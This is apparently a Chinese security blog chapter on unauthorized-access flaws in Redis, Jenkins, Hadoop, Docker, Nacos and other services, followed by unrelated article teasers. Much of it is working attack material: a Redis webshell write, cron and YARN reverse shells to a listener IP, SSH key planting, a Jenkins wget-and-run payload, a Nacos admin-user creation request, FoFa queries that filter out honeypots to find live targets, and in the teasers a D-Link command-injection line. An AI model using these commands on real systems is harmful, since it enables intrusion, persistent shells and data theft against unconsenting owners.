4.1_未授权漏洞

  • 未授权漏洞


  1. 成因:配置错误,默认口令(弱口令),接口配置不当;
  2. 未授权漏洞
漏洞利用方式

Redis 未授权访问漏洞

 
Getshell方式
  1. 写入webshell;
    1. 连接目标redis:redis-cli -h 192.168.7.146 -p 6379
    2. 设置保存目录:config set dir /var/www/html
    3. 设置保存文件名 config set dbfilename test.php
    4. 设置信息:set web "\r\n\r\n<?php @eval($_POST[cmd]); ?>\r\n\r\n"
    5. 保存: save
    6. URL 拼接访问 test.php
  2. 计划任务反弹 shell; ( 计划任务路径:/var/spool/cron/ )
    1. 连接目标redis:redis-cli -h 192.168.7.146 -p 6379
    2. 设置保存目录(写入计划任务):config set dir /var/spool/cron/
    3. 设置保存文件名:config set dbfilename root 
    4. 设置反弹的IP和端口:set xx "\n* * * * * bash -i >& /dev/tcp/192.168.7.229/4444 0>&1\n" 
    5. 保存:save 
    6. 本机监听 4444 端口,等待反弹shel :nc lvnp 4444 
  3. 写入 SSH 公钥;
    1. 用户本机生成公私钥(选项默认即可):

      ssh-keygen -t rsa

    2. 进入 /root/.ssh/ 目录 (需管理员权限);
    3. 将公钥保存到 redis_rsa.txt(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > redis_rsa.txt
    4. 将保存的公钥,写入目标机器:cat redis_rsa.txt | redis-cli -h 192.168.7.146 -x set crack
    5. 查看是否存在 /root/.ssh
      1. config set dir /root/.ssh
      2. config set dbfilename authorized_keys
      3. save 
    6. 尝试连接:
      1. cd .ssh
      2. ssh -i id_rsa root@192.168.7.146
    7. 利用工具 redis-rogue-server.py:
      1. 语句: python redis-rogue-server.py --rhost 192.168.7.146 --rport 6379 --lhost 192.168.7.229
  4. 主从复制;
  5. 沙盒命令执行;
FoFa 语句port="6379" && protocol="redis"

Rsync 未授权访问漏洞

利用方式-任意文件下载/上传
  1. nmap扫描端口发现 Rsync 服务(873端口)
  2. 列出同步目录:rsync rsync://192.168.7.10:873
  3. 列出模块下文件: rsync rsync://192.168.7.10:873/debiancn
  4. 下载任意文件:
    1. rsync rsync://192.168.7.10:873/debiancn
    2. rsync rsync://192.168.7.10:873/debiancn/a.txz/home/kali/Desktop/a.txz
  5. 上传任意文件:rsync 本地文件 192.168.7.185::上传目录位置

FoFa 语句

(port="873") && (is_honeypot=false && is_fraud=false)

Springboot actuator未授权访问

利用方式—敏感信息泄露
  1. /env 显示环境变量信息;
  2. /info 显示应用信息;
  3. /dump 显示转储信息;
  4. /headdump 显示内存信息;
FoFa 语句

(icon_hash="116323821") && (is_honeypot=false && is_fraud=false) && port="9001" && title=="RocketMg-console-ng"

Swagger-UI未授权访问

利用方式- 接口爆破
  1. 通过遍历接口字典,寻找未授权访问
    /api
    /api-docs
    /api-docs/swagger.json
    /api.html
    /api/api-docs
    /api/apidocs
    /api/doc
    /api/swagger
    /api/swagger-ui
    /api/swagger-ui.html
    /api/swagger-ui.html/
    /api/swagger-ui.json
    /api/swagger.json
    /api/swagger/
    /api/swagger/ui
    /api/swagger/ui/
    /api/swaggerui
    /api/swaggerui/
    /api/v1/
    /api/v1/api-docs
    /api/v1/apidocs
    /api/v1/swagger
    /api/v1/swagger-ui
    /api/v1/swagger-ui.html
    /api/v1/swagger-ui.json
    /api/v1/swagger.json
    /api/v1/swagger/
    /api/v2
    /api/v2/api-docs
    /api/v2/apidocs
    /api/v2/swagger
    /api/v2/swagger-ui
    /api/v2/swagger-ui.html
    /api/v2/swagger-ui.json
    /api/v2/swagger.json
    /api/v2/swagger/
    /api/v3
    /apidocs
    /apidocs/swagger.json
    /doc.html
    /docs/
    /druid/index.html
    /graphql
    /libs/swaggerui
    /libs/swaggerui/
    /spring-security-oauth-resource/swagger-ui.html
    /spring-security-rest/api/swagger-ui.html
    /sw/swagger-ui.html
    /swagger
    /swagger-resources
    /swagger-resources/configuration/security
    /swagger-resources/configuration/security/
    /swagger-resources/configuration/ui
    /swagger-resources/configuration/ui/
    /swagger-ui
    /swagger-ui.html
    /swagger-ui.html#/api-memory-controller
    /swagger-ui.html/
    /swagger-ui.json
    /swagger-ui/swagger.json
    /swagger.json
    /swagger.yml
    /swagger/
    /swagger/index.html
    /swagger/static/index.html
    /swagger/swagger-ui.html
    /swagger/ui/
    /Swagger/ui/index
    /swagger/ui/index
    /swagger/v1/swagger.json
    /swagger/v2/swagger.json
    /template/swagger-ui.html
    /user/swagger-ui.html
    /user/swagger-ui.html/
    /v1.x/swagger-ui.html
    /v1/api-docs
    /v1/swagger.json
    /v2/api-docs
    /v3/api-docs
FoFa 语句title="Swagger UI"

JBOSS 未授权访问

利用方式——后台部署war包getshell
  1. /jmx-console/ 无需登录进入后台,例:http://127.0.0.1:8080/jmx-console/
  2. 找到 jboss.deployment 进入应用部署页面,部署war包
  3. 参考链接:JBoss未授权访问漏洞Getshell过程复现_jobss 5.0.1 getshell-CSDN博客
FoFa 语句(title="Welcome to JBoss™") && (is_honeypot=false && is_fraud=false)

Jenkins 未授权访问漏洞

利用方式-执行系统命令

(举例:反弹shell)

  1. 无需密码登录后台,找到执行语句的功能点
  2. 监听:nc -lvnp 4444
  3. 上传反弹shell语句文件到VPS;
  4. VPS 启动 HTTP 服务:python -m SimpleHTTPServer 8080 (我这里是python2.x版本的,3.x版本的更换一下命令)
  5. 命令执行框远程下载下载:println "wget http://192.168.7.10:8080/1.sh".execute().text
  6. 修改下载文件权限:println "chmod +x 1.sh".execute().text
  7. 执行:println "./1.sh".execute().text
  8. 查看监听的VPS 是否反弹到shell;

FoFa 语句

(port="8080" && app="jenkins" && app="jenkins")&&(is_honeypot=false && is_fraud=false) && title=="Dashboard [Jenkins]"

Hadoop 末授权访问漏洞

利用方式-后台执行exp反弹shell
  1. 访问 /cluster,例:http://192.168.7.10:8088/cluster
  2. 在本地监听端口 > 创建Application > 调用Submit Application API提交
  3. 执行exp脚本  ↓
    # python脚本
     
    import requests
    import sys
     
    target = 'http://192.168.49.134:8088'	# 目标机ip
    lhost = '192.168.49.132' 		# 将你的本地ip填在这里,使用nc监听555端口 
     
    target = sys.argv[1]
    #lhost = sys.argv[2]
     
    url = target + '/ws/v1/cluster/apps/new-application'
    resp = requests.post(url)
    app_id = resp.json()['application-id']
    url = target + '/ws/v1/cluster/apps'
    data = {
        'application-id': app_id,
        'application-name': 'get-shell',
        'am-container-spec': {
            'commands': {           # 可以在这里该监听端口↓
                'command': '/bin/bash -i >& /dev/tcp/%s/555 0>&1' % lhost,  
            },
        },
        'application-type': 'YARN',
    }
    requests.post(url, json=data)r

FoFa 语句

port="8080"&& app="Hadoop"

Memcached 未授权访问漏洞

利用方式-敏感信息泄露
  1. telnet探测:
    1. telnet IP 11211,例:telnet 192.168.7.10 11211
    2. 连接后查看memcache服务信息:stats
  2. nmap -p 11211 --script memcached-info IP

FoFa 语句

app="Memcached"

Elasticsearch 未授权访问漏洞

利用方式-敏感信息泄露
  1. /_plugin/head/  web 管理界面
  2. /_cat/indices 所有索引的元数据信息
  3. /_river/_search 查看数据库的敏感信息
  4. /_nodes 查看节点数据

FoFa 语句

("ELasticsearch"&&port="9200")&&(is_honeypot=false && is_fraud=false)

Kibana 未授权访问漏洞

利用方式-未授权访问
  1. /app/kbana#/ ,例:http://192.168.7.10:5601/app/kibana#/
  2. 无需账号密码就可以登录进入页面

FoFa 语句

("kibana" && port ="5601") && (is_honeypot=false && is_fraud=false)

Docker Remote API 未授权访问漏洞

利用方式-敏感信息泄露
  1. 浏览器访问:
    1. http://ip:2375/version
    2. http://ip:2375/info
    3. 例:http://192.168.7.10:2375/version
  2. docker 访问:
    1. docker -H tcp://192.168.7.10:2375 ps -a

FoFa 语句

(port="2375") && (is_honeypot=false && is_fraud=false)

Kubernetes Api Server 未授权访问漏洞

利用方式-敏感信息泄露
  1. 浏览器直接访问ip的8080服务,会返回API列表;
  2. 例:http://192.168.7.10:8080/
  3. 再添加 /ui 后缀,会跳转到 dashboard 页面,可以创建,修改,删除,查看日志等;

FoFa 语句

(port="8080"&& app="Kubernetes") && (is_honeypot=false && is_fraud=false)

ActiveMQ 未授权访问漏洞

利用方式-弱口令
  1. :8186/admin/(默认8186端口),默认账户密码都是 admin,访问登录成功即可

FoFa 语句

(body="ActiveMQ" && port="8161" && country="CN") && (is_honeypot=false && is_fraud=false)

RabbitMQ 未授权访问漏洞

利用方式-弱口令
  1. 替换为下列端口,可以访问,不行的加/#/试试,默认账号密码都是 guest

FoFa 语句

  1. port="15672" || port="15692" || port="25672"
  2. icon_hash="-1015107330" 

FTP 未授权访问漏洞

利用方式-空密码
  1. 文件夹输入cmd,进入命令执行环境;
  2. 由于其开启了匿名登录,所以可以直接连接,格式:ftp://ip:端口
  3. 例:ftp://192.168.7.10

FoFa 语句

port="21"

VNC 未授权访问漏洞

利用方式-空密码
  1. kali 执行: vncviewer [IP] 
  2. 例:vncviewer 192.168.7.10,出现其他用户界面即存在

FoFa 语句

(port="5900") && (is_honeypot=false && is_fraud=false) && product="VNC"

dubbo 未授权访问漏洞

利用方式-telnet连接服务,执行特定命令
  1. telent [IP] [Port];
  2. 例:telent 192.168.7.10 20894
  3. 执行后,连接到dubbo服务,执行命令(help查看可执行的命令)

FoFa 语句

(app="APACHE-dubbo") &&(is_honeypot=false && is_fraud=false)

Atlassian Crowd 未授权访问漏洞

利用方式-拼接后缀查看响应
  1. 访问:网站/crowd/admin/uploadplugin.action
  2. 例:http://192.168.7.10:8095/crowd/admin/uploadplugin.action
  3. 响应400则存在该漏洞;

FoFa 语句

"Atlassian-Crowd" && port="8095"

Jupyter Notebook未授权访问漏洞

利用方式 - 未授权访问直接访问URL 会直接跳到 web 管理界面(无需输入密码)
 FoFa 语句("Jupyter Notebook" && port="8888") && (is_honeypot=false $$ is_fraud=false)

Mongodb 未授权访问漏洞

利用方式-空密码
  1. 访问可以直接连接数据库(空口令);
  2. nmap验证:nmap -p 27017 --script mongodb-info 192.168.7.10
FoFa 语句product="MongoDB-数据库"&& port="27017" && country≠"CN"

Nacos未授权漏洞 (端口8848)

利用方式
CVE-2021-29441 
  1. 影响版本 Nacos ≤  2.0.0-ALPHA.1
  2. 查看用户列表 /nacos/v1/auth/users?pageNo=1&pageSize=1
  3. POST请求方式访问:/nacos/v1/auth/users
  4. 添加POST参数:username=demo&password=demo
  5. 修改UA为:Nacos-Server
  6. 访问登录页面:ip:8848/nacos/#/login
  7. 尝试使用创建的demo用户登录
  8. PS:查看创建的用户:/nacos/v1/auth/users?pageNo=1&pageSize=1&search=blur
nacos身份绕过漏洞
  1. 影响版本 0.1.0 ≤ Nacos ≤ 2.2.0
  2. 访问登录页面:ip:8848/nacos/#/login
  3. 拦截登录请求的数据包
  4. 尝试修改数据包内容,如添加或修改Authorization头部,以伪造有效的认证信息,示例:

    HTTP/1.1 200
    Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
    Content-Type: application/json;charset=UTF-8
    Content-Length: 13
    Date: Wed, 24 Jan 2024 14:50:11 GMT

    {
     "accessToken": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
     "tokenTtl": 18000,
     "globalAdmin": false,
     "username": "nacos"
    }

  5. 成功登录后台
FoFa 语句title="Swagger UI"
影响版本Nacos ≤ 2.0.0-ALPHA.1

工具推荐(支持38种未授权检测):GitHub - xk11z/unauthorized: 常见的未授权漏洞检测   ,

1 、FTP 未授权访问(21)
2 、LDAP 未授权访问(389)
3 、Rsync 未授权访问(873)
4 、ZooKeeper 未授权访问(2181)
5 、Docker 未授权访问(2375)
6 、Docker Registry未授权(5000)
7 、Kibana 未授权访问(5601)
8 、VNC 未授权访问(5900、5901)
9 、CouchDB 未授权访问(5984)
10 、Apache Spark 未授权访问(6066、8081、8082)
11 、Redis 未授权访问(6379)
12 、Weblogic 未授权访问(7001)
13 、HadoopYARN 未授权访问(8088)
14 、JBoss 未授权访问(8080)
15 、Jenkins 未授权访问(8080)
16 、Kubernetes Api Server 未授权(8080、10250)
17 、Active MQ 未授权访问(8161)
18 、Jupyter Notebook 未授权访问(8888)
19 、Elasticsearch 未授权访问(9200、9300)
20 、Zabbix 未授权访问(10051)
21 、Memcached 未授权访问(11211)
22 、RabbitMQ 未授权访问(15672、15692、25672)
23 、MongoDB 未授权访问(27017)
24 、NFS 未授权访问(2049、20048)
25 、Dubbo 未授权访问(28096)
26 、Druid 未授权访问
27 、Solr 未授权访问
28 、SpringBoot Actuator 未授权访问
29 、SwaggerUI未授权访问漏洞
30 、Harbor未授权添加管理员漏洞
31 、Windows ipc共享未授权访问漏洞
32 、宝塔phpmyadmin未授权访问
33 、WordPress未授权访问漏洞
34 、Atlassian Crowd 未授权访问
35 、PHP-FPM Fastcgi未授权访问漏洞
36 、uWSGI未授权访问漏洞
37 、Kong未授权访问漏洞
38 、ThinkAdminV6未授权访问漏洞

  • 免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/922543.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

快速识别模型:simple_ocr,部署教程

快速识别图片中的英文、标点符号、数学符号、Emoji, 模型会输出图片中文字行的坐标位置、最低得分、识别结果。当前服务用到的模型&#xff1a;检测模型、数字识别、英文符号识别。 一、部署流程 1.更新基础环境 apt update2.安装miniconda wget https://repo.anaconda.com/…

衡山派D133EBS 开发环境安装及SDK编译烧写镜像烧录

1.创建新文件夹&#xff0c;用来存放SDK包&#xff08;其实本质就是路径要对就ok了&#xff09;&#xff0c;右键鼠标通过Open Git Bash here来打开git 输入命令 git clone --depth1 https://gitee.com/lcsc/luban-lite.git 来拉取&#xff0c;如下所示&#xff1a;&#xff0…

蓝桥杯不知道叫什么题目

小蓝有一个整数&#xff0c;初始值为1&#xff0c;他可以花费一些代价对这个整数进行变换。 小蓝可以花贵1的代价将教数增加1。 小蓝可以花费3的代价将整数增加一个值,这个值是整数的数位中最大的那个(1到9) .小蓝可以花费10的代价将整数变为原来的2倍, 例如&#xff0c;如果整…

读取mysql、kafka数据筛选后放入mysql

要求&#xff1a; 从kafka的topic-car中读取卡口数据&#xff0c;将超速车辆写入mysql的t_monitor_info表 当通过卡口的车速超过该卡口限速的1.2倍 就认定为超速。 G107 1&#xff09;卡口数据格式如下&#xff1a; action_time long --摄像头拍摄时间戳&#xff0c;精确到秒…

CVE-2022-24124

根据提示 访问api/get-organizations salmap和手工注入都不行&#xff0c;使用substring() 查库&#xff0c;查到有4个库 ?p1&pageSize10&valuee99nb&sortField&sortOrder&field (substring((select count(schema_name) from information_schema.sche…

采用python3.12 +django5.1 结合 RabbitMQ 和发送邮件功能,实现一个简单的告警系统 前后端分离 vue-element

一、开发环境搭建和配置 #mac环境 brew install python3.12 python3.12 --version python3.12 -m pip install --upgrade pip python3.12 -m pip install Django5.1 python3.12 -m django --version #用于检索系统信息和进程管理 python3.12 -m pip install psutil #集成 pika…

Python文件夹.idea的作用

每当我们创建python的时候&#xff0c;发现文件夹里面都会有.idea文件夹。 那么这个是什么东西呢&#xff1f; .idea是集成开发环境&#xff08;IDE&#xff09;创建项目时自动生成的配置目录。 .idea文件目录介绍&#xff1a; workspace.xml&#xff1a;包含项目的整体配置信…

【计算机网络】多路转接之poll

poll也是一种linux中的多路转接方案(poll也是只负责IO过程中的"等") 解决&#xff1a;1.select的fd有上限的问题&#xff1b;2.每次调用都要重新设置关心的fd 一、poll的使用 int poll(struct pollfd *fds, nfds_t nfds, int timeout); ① struct pollfd *fds&…

使用 Elastic 收集 Windows 遥测数据:ETW Filebeat 输入简介

作者&#xff1a;来自 Elastic Chema Martinez 在安全领域&#xff0c;能够使用 Windows 主机的系统遥测数据为监控、故障排除和保护 IT 环境开辟了新的可能性。意识到这一点&#xff0c;Elastic 推出了专注于 Windows 事件跟踪 (ETW) 的新功能 - 这是一种强大的 Windows 原生机…

.net core MVC入门(一)

文章目录 项目地址一、环境配置1.1 安装EF core需要包1.2 配置数据库连接二、使用EF创建表2.1 整体流程梳理2.1 建表详细流程三、添加第一个视图3.1整体流程梳理3.1 添加视图,并显示在web里四、使用EF增加Catogory数据,并且读取数据到页面4.1整体流程梳理4.2 实现五、增加Cat…

短视频矩阵矩阵,矩阵号策略

随着数字媒体的迅猛发展&#xff0c;短视频平台已经成为企业和个人品牌推广的核心渠道。在这一背景下&#xff0c;短视频矩阵营销策略应运而生&#xff0c;它通过高效整合和管理多个短视频账号&#xff0c;实现资源的最优配置和营销效果的最大化。本文旨在深入探讨短视频矩阵的…

决策回归树【原理/算例/决策回归树 VS 线性回归】

决策回归树 1. 决策回归树原理2. 决策回归树算例3. 手动计算MSE和最优划分属性4. 决策回归树 VS 线性回归 1. 决策回归树原理 决策回归树&#xff0c;虽然叫做“回归”树&#xff0c;但是它的本质还是分类算法&#xff0c;只是分的类别多一点。 1. 回归树的裂分指标 回归树种&…

基于STM32的智能鱼缸控制系统的Proteus仿真

文章目录 一、智能鱼缸控制系统1.题目要求2.思路2.1 主控2.2 传感器2.3 按键2.4 声光报警2.5 自动换水&#xff0c;喂食&#xff0c;供氧2.6 OLED显示2.7 电源部分2.8 远程终端 3.电路仿真3.1 未仿真时3.2 开始仿真&#xff0c;正常显示3.3 按下设置按键&#xff0c;进入阈值界…

【Python爬虫】Scrapy框架实战---百度首页热榜新闻

如何利用Scrapy框架实战提取百度首页热榜新闻的排名、标题和链接 一、安装Scrapy库 二、创建项目&#xff08;以BaiduSpider为例&#xff09; scrapy startproject BaiduSpider生成每个文件的功能&#xff1a; 二、 创建爬虫脚本&#xff08;爬虫名&#xff1a;news&#xff…

mysql-分析MVCC原理

一、MVCC简介 MVCC是一种用来解决读写冲读的无锁并发控制&#xff0c;也就是为事务分配单增长的时间戳&#xff0c;为每个修改保存一个版本&#xff0c;版本与事务时间戳关联&#xff0c;读操作只读该事务开始前的数据库的快照&#xff0c;所以MVCC可以为数据库解决一些问题。…

论文笔记:Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks

1. 挑战/问题&#xff08;Challenges/Issues&#xff09;&#xff1a; 这篇论文探讨了大型预训练语言模型在处理知识密集型自然语言处理&#xff08;NLP&#xff09;任务时面临的挑战。尽管这些模型在参数中存储了大量事实知识&#xff0c;并在微调后能够在下游NLP任务中取得很…

嵌入式硬件电子电路设计(六)LDO低压差线性稳压器全面详解

引言&#xff1a; LDO&#xff08;Low Dropout Regulator&#xff0c;低压差线性稳压器&#xff09;是一种常用的电源管理组件&#xff0c;用于提供稳定的输出电压&#xff0c;同时允许较小的输入电压与输出电压之间的差值。LDO广泛应用于各种电子设备中&#xff0c;特别是在对…

Spring:AOP面向切面案例讲解AOP核心概念

Spring的AOP&#xff0c;在不惊动(改动)原有设计(代码)的前提下&#xff0c;想给谁添加功能就给谁添加。这个也就是Spring的理念&#xff1a; 无入侵式/无侵入式 AOP中核心概念分别指的是什么? 连接点切入点通知通知类切面 下面以一个例子进行讲解&#xff0c;直接上代码&a…

禁止Chrome的自动升级

一、需求分析 因为用Chromeselenium做了网页自动化填写任务&#xff0c;如果Google Chrome浏览器自动升级&#xff0c;就会导致chromedriver加载失败&#xff0c;自动化任务失效&#xff0c;因此需要禁止Chrome浏览器的自动升级。 二、当前环境 三、实际配置 运行注册表编辑…

2024年wordpress、d-link等相关的多个cve漏洞poc

⚠️ 漏洞 ✅ CVE-2024-10914 在D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L中发现的漏洞&#xff0c;版本直到20241028 GET /cgi-bin/account_mgr.cgi?cmdcgi_user_add&name%27;id;%27 HTTP/1.1✅ CVE-2024-11305 在Altenergy Power Control Software中发现的关键…